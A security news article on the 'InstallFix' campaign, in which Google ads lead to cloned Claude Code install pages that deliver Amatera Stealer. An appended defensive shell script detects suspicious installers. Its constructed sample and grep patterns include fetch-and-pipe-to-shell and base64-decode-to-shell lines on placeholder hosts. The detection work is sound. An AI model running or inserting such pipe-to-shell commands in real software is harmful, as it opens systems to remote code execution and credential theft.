A new cyberattack campaign called "InstallFix" uses fake Google ads to promote cloned installation pages for AI coding tools like Claude Code. When users copy and paste the malicious installation commands, they unknowingly deploy Amatera Stealer malware, which steals credentials. The attack exploits the common, risky practice of pasting commands directly from websites into terminals. The main topics covered are the specific "InstallFix" attack technique, the use of malvertising and social engineering, and the security risks of copying CLI commands.
'InstallFix' Attacks Spread Fake Claude Code Sites
A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces.
A new variation of the ClickFix technique is capitalizing on the popularity of Anthropic's Claude Code and other AI coding tools.
Researchers at Push Security discovered the threat campaign, which combines malvertising with a social engineering attack. The research team found fake install pages for Claude Code were spreading exclusively through Google-sponsored links for searches such as "Claude Code," "Claude Code install," and "Claude Code CLI."
The cloned installation pages for Anthropic's coding assistant are near-identical to the real thing, Jacques Louw, Push Security co-founder and chief product officer (CPO), explained in a blog post published Friday. But when victims copy the malicious install commands from the cloned sites, they deploy the Amatera Stealer malware, which could swipe developers' credentials and give attackers access to enterprise development environments.
While there's nothing revolutionary about this approach, which Push Security calls "InstallFix," Louw explained that attackers have recognized the increased tendency among users to simply copy and paste commands into their systems and execute them. The attacks highlight an insecure practice that has, unfortunately, become the norm these days.
"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you'd only try once before some grizzled senior engineer beat it out of you," Louw wrote. "That's because you're effectively handing a website a blank cheque to execute whatever it wants on your system."
ClickFix & CLI Tools Make a Dangerous Match
ClickFix is a widely used social engineering technique that typically delivers error messages of some kind to convince unsuspecting users to execute malicious commands. The error messages typically feature fake browser updates, but variations of the technique have used everything from phony Blue Screens of Death to audio errors for fake job interviews conducted over videoconferencing.
InstallFix, however, might be the most apt variant yet because it targets a class of user that's probably comfortable with copying and pasting commands. Like many AI coding assistants, Louw explained, Anthropic's recommended install method for Claude Code is pasting and executing a one-line command in a system terminal.
And it's not just AI coding assistants; Louw wrote that hundreds of the most popular developer and command-line interface (CLI) tools ship with the same installation instructions. Attackers know that this has become a standard practice and are now exploiting it.
"The entire security model boils down to 'trust the domain.' And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security-conscious pool of users," Louw wrote.
Capitalizing on Claude Code
According to Push Security, malicious Google ads are an ideal delivery mechanism because, unlike phishing emails, the malicious links won't be caught by email security scans. Plus, the attackers are taking advantage of the increasing interest in Claude Code with the sponsored search results, which appear above organic search results and could fool users who quickly click on a link without realizing it's an ad.
While the InstallFix campaign may seem like it's tailored to take advantage of shadow AI adoption and inexperienced coders, Louw tells Dark Reading that's not necessarily the case. The threat actors behind the campaign are targeting a mainstream AI tool that is likely already in use in many organizations, and the risky path a user takes to install the tool, he says. The scheme can affect both experienced developers and amateur vibe-coders.
"I suspect this campaign is targeting Claude Code specifically, because it's one of the tools (if not the tool) being adopted the fastest across the board," he says. "This is mirrored by the high rate of new account creations we see across our customers for Anthropic products."
Push Security warned that in addition to abusing Google's sponsored links, the threat actors behind the InstallFix attacks are using domains from legitimate providers such as Cloudflare Pages, Tencent EdgeOne, and Squarespace, which appear innocuous and blend in with normal traffic activity. Louw said such abuse has been a common theme that Push Security has observed across virtually every phishing site and malicious link these days.
Users should be extremely cautious when copying and pasting commands into their terminals and should take additional time to verify that the domains providing such commands are in fact authentic. While Push Security provided indicators of compromise (IoCs) for the InstallFix attacks, Louw said the data has limited value because domains for campaigns like this one tend to have a short lifespan.
"This is a fast-moving situation, with domains constantly being spun up," he wrote.
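The "blank cheque" problem Louw describes (pasting a one-line `curl ... | sh` installer straight into a terminal) and the advice above to verify the domain serving the command both come down to the same habit: save the script, look at it, then decide. The wrapper below is an added example written for this article; it is not Push Security's, Anthropic's, or any vendor's code. It checks the installer URL's host against an exact-match allowlist, hashes the saved script, and flags constructs that deserve a human read (a second-stage fetch piped into a shell, run-time decoding of an embedded payload, `eval`, non-printable bytes). It never executes the installer itself. The allowlist entries, URLs and the two sample installer scripts are constructed placeholders on the reserved `.invalid` TLD, not real vendor or attacker domains.

```shell
#!/bin/sh
# Added example (not from the article, Push Security or Anthropic): a
# "save it, read it, then decide" wrapper for one-line installers.
# Allowlist entries and sample scripts are constructed placeholders.

# Hosts you expect installers to come from (constructed; edit for your environment).
INSTALLER_ALLOWLIST="install.example-vendor.invalid docs.example-vendor.invalid"

# host_of URL -> hostname portion of an http(s) URL, with any port or path removed.
host_of() {
    printf '%s\n' "$1" | sed -E 's#^[A-Za-z]+://([^/:?]+).*#\1#'
}

# host_allowed URL -> 0 if the host is exactly on the allowlist, else 1.
# Exact matching rejects lookalikes such as install.example-vendor.invalid.attacker.invalid
# or install-example-vendor.invalid, which is where sponsored-link clones tend to live.
host_allowed() {
    h=$(host_of "$1")
    for allowed in $INSTALLER_ALLOWLIST; do
        [ "$h" = "$allowed" ] && return 0
    done
    return 1
}

# inspect_script FILE -> prints one line per red flag, returns 0 if none, else 1.
inspect_script() {
    f="$1"
    hits=0
    # A second-stage fetch piped straight into a shell.
    if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$f"; then
        echo "FLAG: fetches another script and pipes it into a shell"; hits=1
    fi
    # An embedded payload decoded at run time.
    if grep -Eq 'base64[[:space:]]+(-d|-D|--decode)|xxd[[:space:]]+-r' "$f"; then
        echo "FLAG: decodes an embedded payload at run time"; hits=1
    fi
    # eval on a string built at run time.
    if grep -Eq '(^|[^[:alnum:]_])eval[[:space:]]' "$f"; then
        echo "FLAG: uses eval on a constructed string"; hits=1
    fi
    # Non-printable or non-ASCII bytes: hidden characters or lookalike glyphs.
    if LC_ALL=C grep -q '[^[:print:][:space:]]' "$f"; then
        echo "FLAG: contains non-printable or non-ASCII bytes"; hits=1
    fi
    return $hits
}

# sha256_of FILE -> hex digest, using whichever tool the system has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# review_installer URL FILE -> 0 only if the host is expected AND nothing is flagged.
# In real use you would first save the script with:  curl -fsSL "$url" -o "$file"
# and compare the printed digest with one published out of band (docs, release notes).
review_installer() {
    url="$1"; file="$2"
    if ! host_allowed "$url"; then
        echo "REFUSED: host $(host_of "$url") is not an expected installer host"
        return 1
    fi
    echo "sha256: $(sha256_of "$file")"
    if ! inspect_script "$file"; then
        echo "REFUSED: script flagged; read it before running anything"
        return 1
    fi
    echo "OK to review manually: sh $file"
    return 0
}

# write_samples -> creates two constructed installer scripts; sets BENIGN_SAMPLE / SUSPECT_SAMPLE.
write_samples() {
    BENIGN_SAMPLE=$(mktemp); SUSPECT_SAMPLE=$(mktemp)
    cat > "$BENIGN_SAMPLE" <<'EOF'
#!/bin/sh
# constructed benign installer: fetches an archive to a file, checks the platform, unpacks
set -e
uname -m | grep -q x86_64 || { echo "unsupported platform"; exit 1; }
curl -fsSL https://install.example-vendor.invalid/tool.tar.gz -o "$HOME/tool.tar.gz"
tar -xzf "$HOME/tool.tar.gz" -C "$HOME/.local/bin"
echo "installed"
EOF
    cat > "$SUSPECT_SAMPLE" <<'EOF'
#!/bin/sh
# constructed suspicious installer: the payload is a placeholder, nothing here is runnable
curl -fsSL https://cdn.placeholder.invalid/second-stage | sh
echo PAYLOAD_BASE64_PLACEHOLDER | base64 -d | sh
EOF
}

write_samples
if review_installer "https://install.example-vendor.invalid/install.sh" "$BENIGN_SAMPLE"; then echo "-- benign sample: passed review"; fi
if ! review_installer "https://install.example-vendor.invalid.attacker.invalid/install.sh" "$SUSPECT_SAMPLE"; then echo "-- lookalike host: refused"; fi
if ! review_installer "https://install.example-vendor.invalid/install.sh" "$SUSPECT_SAMPLE"; then echo "-- expected host, flagged script: refused"; fi
```

The grep patterns are deliberately narrow: a legitimate installer that downloads an archive to a file, checks the platform and unpacks it trips none of them, while the two things a stealer dropper almost always needs (fetching or decoding a second stage and handing it to a shell) do. The host check is exact-match on purpose; substring or suffix matching is exactly what a cloned page on a lookalike domain is built to pass. Note that the sponsored-link clone still serves a plausible script, so the allowlist, not the script's appearance, is what catches a well-made fake.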